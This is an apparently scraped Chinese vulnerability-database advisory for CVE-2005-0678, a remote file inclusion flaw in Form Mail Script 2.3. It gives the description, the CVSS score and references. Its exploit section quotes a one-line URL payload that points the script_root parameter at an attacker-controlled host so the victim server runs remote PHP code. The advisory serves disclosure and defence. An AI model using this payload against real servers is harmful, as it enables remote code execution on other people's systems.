Form Mail Script PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1108501 漏洞类型 未知
发布时间 2005-03-05 更新时间 2005-05-02
CVE编号 CVE-2005-0678 CNNVD-ID CNNVD-200505-657
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/857
https://www.securityfocus.com/bid/90198
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-657
|漏洞详情
用于FormMailScript2.3及更早版本的formmail.inc.php存在PHP远程文件包含漏洞,远程攻击者可以通过修改script_root来引用一个远程web服务器上含有该代码的URL,从而执行任意PHP代码。
|漏洞EXP
Example:

 if register_globals=on and allow_url_fopen=on:
   http://[victim]/[dir]/inc/formmail.inc.php?script_root=http://[hacker_box]/

# milw0rm.com [2005-03-05]
|受影响的产品
Stadtaus Form Mail Script 2.3
|参考资料

来源:www.stadtaus.com
链接:http://www.stadtaus.com/forum/t-1579.html
来源:SECUNIA
名称:14505
链接:http://secunia.com/advisories/14505
来源:SECTRACK
名称:1013378
链接:http://securitytracker.com/id?1013378
来源:BUGTRAQ
名称:20050304PHPFormMailScript(2.3)-ArbitraryFileInclusion(VXSfx)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=110996489800035&w=2